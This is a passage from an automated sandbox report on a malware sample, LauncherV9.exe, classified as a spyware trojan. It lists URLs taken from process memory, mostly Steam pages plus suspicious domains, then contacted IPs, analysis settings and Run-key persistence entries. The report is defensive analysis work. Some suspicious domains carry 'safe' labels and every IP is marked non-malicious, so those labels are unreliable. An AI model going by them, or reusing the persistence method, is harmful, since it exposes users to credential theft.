dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.clo	dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://latchclan.sh	jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.pifk	Service.exe, 00000016.00000002.2512379907.0000006EFF6F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000017.00000002.2512372468.000000CD352F9000.00000004.00000010.00020000.00000000.sdmp, Service.exe, 00000018.00000002.2512378824.000000B1744F9000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp	dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.enigmaprotector.com/	dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	false		high
https://gemini.google.com/app?q=	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	jaclo.exe, 0000000D.00000003.1385496112.000000000137B000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.000000000136C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1398064042.000000000137A000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400725676.000000000137B000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496894411.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612242339.000000000127D000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436290691.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558746783.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=	dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pupmeholk.bet/	dll.exe, 00000010.00000003.1553180293.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipify.org/er	Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamloopback.host	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb	dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.org/5G	Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.enigmaprotector.com/openU	jaclo.exe, 0000000D.00000002.1400014459.0000000000BFE000.00000040.00000001.01000000.00000005.sdmp, dll.exe, 00000010.00000002.1611384789.00000000003CF000.00000040.00000001.01000000.00000006.sdmp	false		high
https://steamcommunity.com/(	dll.exe, 00000010.00000002.1613070327.0000000004000000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.ipify.org/s	Service.exe, 00000017.00000002.2513144408.00000270A9EEE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://medal.tv	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/Q	dll.exe, 00000010.00000002.1612064321.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558165150.0000000001209000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
89.208.104.175	unknown	Russian Federation	42569	PSKSET-ASRU	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
23.197.127.21	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
104.21.96.1	pupmeholk.bet	United States	13335	CLOUDFLARENETUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
104.73.234.102	unknown	United States	16625	AKAMAI-ASUS	false
185.199.110.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1639444
Start date and time:	2025-03-15 16:38:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LauncherV9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@27/18@17/7
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 64% Number of executed functions: 60 Number of non-executed functions: 154
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 23.199.214.10, 4.245.163.56, 20.199.58.43, 150.171.27.10, 2.23.227.215, 20.12.23.50
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:39:04	API Interceptor	112x Sleep call for process: powershell.exe modified
11:39:18	API Interceptor	7x Sleep call for process: dll.exe modified
16:39:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FileAutostart C:\Users\user\AppData\Local\Service.exe
16:39:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FileAutostart C:\Users\user\AppData\Local\Service.exe

Joe Sandbox View / Context

IPs

